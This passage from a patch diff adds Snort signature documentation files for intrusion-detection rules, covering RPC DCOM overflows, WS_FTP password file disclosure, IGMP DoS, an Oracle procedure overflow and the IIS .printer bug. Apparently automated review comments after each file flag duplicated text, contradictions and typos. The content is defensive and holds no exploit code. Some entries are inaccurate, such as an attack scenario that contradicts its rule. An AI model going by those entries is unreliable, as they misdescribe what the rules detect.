+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
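Review bot: another verbatim copy of the 3202.txt RPC DCOM text with only the Sid changed to 3282. Detailed Information should state what SID 3282 detects that the other RPC DCOM rules in this patch do not; the "Expoit" typo in Ease of Attack and the empty Additional References section are carried over unchanged.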
--- /dev/null
+++ b/doc/signatures/2013.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+2013
+
+--
+Summary:
+CVS is the Concurrent Versions System, commonly used to 
+help manage software development.
+
+--
+Impact:
+This may be an intelligence gathering activity or an attempt to view a 
+module the user does not have access to. Should this attempt be 
+succesful the entire CVS repository may be compromised.
+
+--
+Detailed Information:
+This rule detects attempts to connect to a CVS repository that fail due 
+indicate determined activity by an attacker to gain unauthorized access 
+to the CVS respository.
+
+The source code of software in the repository may be compromised by a 
+succesful attacker who could choose to insert malicious code of his own 
+making.
+
+--
+Affected Systems:
+	All versions of CVS
+	
+--
+Attack Scenarios:
+This may be an intelligence gathering activity or an attempt to view a
+module the user may not have access to.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+It is possible that an authorized user may mis-type the module name.
+
+--
+False Negatives:
+Connections to the server using zlib compression will not generate this
+event.
+
+--
+Corrective Action:
+Disable the CVS daemon in the file /etc/inetd.conf. Run the CVS daemon 
+as a user other than root that does not have a valid login to the 
+machine.
+
+Disable anonymous cvs access to the server where appropriate.
+
+Maintain checks on the password database and the CVS repository.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVS:
+http://www.cvshome.org/docs/
+
+--
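Review bot: the first sentence of Detailed Information is broken: "This rule detects attempts to connect to a CVS repository that fail due" / "indicate determined activity by an attacker" is missing the failure reason and a connector; it should say what the failed connection is due to (an invalid module name, going by the False Positives note about mis-typed module names) and continue "which may indicate determined activity...". The Summary only defines CVS and never states what the event is; move the definition into Detailed Information and describe the event in Summary as the other files do. Corrective Action says "Disable the CVS daemon in the file /etc/inetd.conf" and, in the same sentence, to run that daemon as an unprivileged user, which contradicts itself; present these as alternatives. Typos: "succesful" (twice), "respository".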
--- /dev/null
+++ b/doc/signatures/1166.txt
@@ -0,0 +1,63 @@
+Rule:  
+
+Sid:
+1166
+
+--
+
+Summary:
+This event is generated when an attempt is made to download the file ws_ftp.ini
+via a web request.
+
+--
+Impact:
+Serious. Information Disclosure.
+
+--
+Detailed Information:
+When a user of WS_FTP chooses "save password" when connecting to an FTP
+server, the password is stored in the file ws_ftp.ini which may be
+accessible via a web server. The stored passwords use a weak encryption
+scheme that is easy broken.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+An attacker might be able to retrieve the file, use one of the widely
+available password cracking tools and gain valid login information to
+the server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Check the host for signs of compromise.
+
+Change all passwords used on the host.
+
+Disallow the use of ftp on the server, consider the use of scp to
+transfer files.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
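Review bot: the "--" separator between "Rule:" and "Sid:" is missing and instead appears after "1166" with a blank line on either side, so the section layout differs from every other file in the patch. Affected Systems is empty (a single whitespace-only line); since Detailed Information implies any web server that exposes a WS_FTP client's ws_ftp.ini, state that. "easy broken" should read "easily broken", and "Original document author unkown" should read "unknown". Additional References is empty.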
--- /dev/null
+++ b/doc/signatures/1613.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1613
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
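Review bot: Impact says "arbitrary code of the attackers choosing" and needs the possessive "attacker's". The Summary and Detailed Information say a "known vulnerability" is being exploited, but no product or vulnerability is named anywhere in the file and Additional References is empty, so an analyst cannot tell what SID 1613 matches; either name it or reword the Summary as generic web-server attack detection.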
--- /dev/null
+++ b/doc/signatures/3365.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3365
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
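Review bot: SID 3365 is yet another verbatim copy of the 3202.txt RPC DCOM text. Without a sentence in Detailed Information saying what this rule matches that 3202, 3367, 3182 and 3282 do not, five separate events share one indistinguishable description; the "Expoit" typo and the empty Additional References section are repeated here too.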
--- /dev/null
+++ b/doc/signatures/1111.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1111
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
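Review bot: Affected Systems is empty; since the text applies to any web server or application running on one, say so rather than leaving the section blank. Detailed Information has the "ona web server" typo ("on a web server"). Additional References is also empty although the Summary refers to "an authentication vulnerability"; if SID 1111 targets a specific product or login path, name it so the event can be triaged.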
--- /dev/null
+++ b/doc/signatures/1495.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1495
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
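Review bot: SID 1495 reuses the 1451.txt text unchanged, including the "ona web server" typo and the missing possessive in "attackers choosing". Detailed Information should name the CGI application or request this rule is specific to, and Additional References should cite the vulnerability; otherwise the document gives an analyst nothing to distinguish this event from the other generic CGI entries in the patch.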
--- /dev/null
+++ b/doc/signatures/1506.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1506
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
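Review bot: "running ona web server" in Detailed Information should read "running on a web server", and "attackers choosing" (Impact and Detailed Information) needs an apostrophe. More substantively, the Summary, Detailed Information and Attack Scenarios here are the same generic CGI text used for sid 1405 later in this patch; nothing says which script or request pattern sid 1506 matches, so a reader cannot tell the two events apart. State the specific URI or parameter the rule looks for, and fill the empty Additional References section.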
--- /dev/null
+++ b/doc/signatures/3303.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3303
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
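Review bot: the Attack Scenarios text ("a request for a file with an overly long filename via a network share") contradicts the Detailed Information above it, which describes a malformed RPC request to an RPC port overflowing a buffer in DCOM; one of the two should be rewritten so the scenario matches the condition the rule detects. "Expoit code exists" under Ease of Attack should be "Exploit code exists". Additional References is empty although Corrective Action tells the reader to apply vendor patches; list the Microsoft bulletin the patches come from.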
--- /dev/null
+++ b/doc/signatures/272.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+272
+
+--
+Summary:
+This event is generated when a remote attacker transmits fragmented IGMP packets with malformed headers to the internal network, indicating an IGMP Denial of Service (DoS) attack.
+
+--
+Impact:
+Denial of service.
+
+--
+Detailed Information:
+If an IGMP packet with a malformed header is transmitted to an unpatched Microsoft Windows computer, the computer may crash when it attempts to process the packet.  
+
+--
+Affected Systems:
+Microsoft Windows 95
+Microsoft Windows 98
+Microsoft Windows 98 SE
+Microsoft Windows NT 4
+
+--
+Attack Scenarios:
+An attacker sends fragmented IGMP packets with malformed headers to a target computer. If the computer is running an unpatched version of Windows, it may crash.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Install the latest patches available for your operating system. See http://www.microsoft.com/technet/security/bulletin/ms99-034.asp for more information.
+
+Implement a packet-filtering firewall to block inappropriate traffic to the network.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/514
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms99-034.asp
+
+--
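Review bot: the Affected Systems entries here are not tab-indented as they are in the other signature documents in this patch; align the style. The Corrective Action paragraph repeats the ms99-034 URL that already appears under Additional References, so a single pointer ("see the Microsoft bulletin under Additional References") would avoid maintaining the link twice. Minor: double space after "process the packet." and trailing whitespace on that line.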
--- /dev/null
+++ b/doc/signatures/3269.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3269
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
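Review bot: this file is word for word identical to the 3303 document earlier in this patch (Summary, Detailed Information, Attack Scenarios, Corrective Action), so it does not tell the reader what sid 3269 detects that 3303 does not; at minimum the Detailed Information should name the specific RPC request or interface this rule matches. As in 3303, the "overly long filename via a network share" scenario does not describe the malformed RPC request the Detailed Information talks about, "Expoit" should be "Exploit", and Additional References is empty.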
--- /dev/null
+++ b/doc/signatures/3310.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3310
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
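Review bot: same copy as sids 3303 and 3269 in this patch with nothing specific to 3310; the Detailed Information should say which DCOM request or port this rule covers, otherwise the five RPC DCOM documents in this patch are interchangeable. The Attack Scenarios paragraph (long filename over a network share) still does not match the malformed RPC request described two sections above, "Expoit code exists" has a typo, and Additional References is empty.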
--- /dev/null
+++ b/doc/signatures/2693.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2693
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure verify_queue_types_no_queue
+. This procedure is included in
+sys.dbms_aqadm.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
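Review bot: the procedure name in Detailed Information is broken across lines with the period on its own line ("verify_queue_types_no_queue" / ". This procedure is included in" / "sys.dbms_aqadm."); join it into one sentence: "vulnerability in the procedure verify_queue_types_no_queue. This procedure is included in sys.dbms_aqadm." "Oracle Oracle9i" under Affected Systems repeats the vendor name. The Corrective Action line "Apply the appropriate vendor supplied patch" has no terminating period, "None Known" is capitalised differently from the "None known." used elsewhere in the patch, and several "-- " separator lines carry trailing whitespace.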
--- /dev/null
+++ b/doc/signatures/1681.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1681
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
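Review bot: the Attack Scenarios section ("Simple. These are Oracle database commands.") answers the Ease of Attack question instead of describing a scenario; it should say how the command reaches the server, which the Detailed Information already hints at (a session from outside the protected network). The sentence "This connection can either be a legitimate telnet connection or the result of spawning a remote shell" refers to a connection the preceding paragraphs never introduce and reads as copied from a shell-command rule document; tie it to the Oracle session or drop it. The variable is written "$ORACLE_PORTS" in Detailed Information and "ORACLE_PORTS" in False Negatives; use one form. "Sid: 1681" puts the value on the heading line, unlike the other files in this patch, and the second Corrective Action line is missing its period.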
--- /dev/null
+++ b/doc/signatures/971.txt
@@ -0,0 +1,62 @@
+Rule:
+--
+Sid:
+971
+
+--
+
+Summary:
+This event is generated when an attempt is made to compromise a web 
+server running IIS 5.0 by exploiting the ".printer" bug.
+
+--
+Impact:
+Serious. Remote unauthorized administrative access.
+
+--
+Detailed Information:
+With the increasing pervasion of the Internet, vendors are adding 
+features into their software to support the networked world.  
+Microsoft's initial implementation of one such feature were the 
+".printer" extensions on IIS 5.0 that first shipped with Windows 2000.
+
+A bug exsisted in the initial release that could result in remote system
+level access to the web server.  A patch has been released that fixes 
+this bug.
+
+--
+Attack Scenarios:
+A hacker could use this vulnerability to get a remote, system level 
+command prompt on the server.
+
+--
+Ease of Attack:
+Simple. Exploit software exists.
+
+--
+False Positives:
+There are legitimate uses of the ".printer" feature, though it is 
+unknown how widely it is used.  You should know if this feature is 
+implemented on your web servers.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Install latest patches from the vendor, or disable the ".printer" extensions using the IIS administration tool.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+Vendor Security Bulletin: MS01-023
+Bugtraq Archive: url,http://www.securityfocus.com/archive/1/181937
+
+--
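Review bot: "Bugtraq Archive: url,http://www.securityfocus.com/archive/1/181937" under Additional References still carries the "url," prefix from the Snort rule's reference keyword; drop it so the line is a plain URL. This file has no Affected Systems section, which every other document in this patch includes; it should list IIS 5.0 on Windows 2000 as stated in the Summary and Detailed Information. Typos: "exsisted" should be "existed", "unkown" should be "unknown", and "implementation of one such feature were" should be "was". There is also no blank line between "Rule:" and the first "--", unlike the other files.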
--- /dev/null
+++ b/doc/signatures/1286.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1286
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
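Review bot: the Impact line "Information gathering possible administrator access." is missing a conjunction; "Information gathering and possible administrator access." Detailed Information and Attack Scenarios talk about retrieving "a sensitive file" but never name the file or path the rule looks for, so a responder cannot check an alert against the request; add the URI. "Sid: 1286" puts the value on the heading line and is followed by two blank lines, unlike the other files. Additional References is empty.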
--- /dev/null
+++ b/doc/signatures/1013.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1013
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
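Review bot: the Detailed Information ("Many known vulnerabilities exist for this platform and the attack scenarios are legion") never identifies which IIS request sid 1013 matches, so the document would apply equally to any IIS sid; state the specific URI or pattern the rule detects. "attackers choosing" in Impact needs an apostrophe, and Additional References is empty.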
--- /dev/null
+++ b/doc/signatures/1077.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1077
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
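Review bot: this is the same generic web-server text used for sids 1524 and 1874 later in this patch; it should say which URI or application sid 1077 matches, otherwise the three events are indistinguishable. The paragraph "Some applications do not perform stringent checks when validating the credentials of a client host" is copied from the CGI documents and has no connection to the Summary's "known vulnerability on a web server"; drop it or replace it with the actual weakness. "attackers choosing" needs an apostrophe; Additional References is empty.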
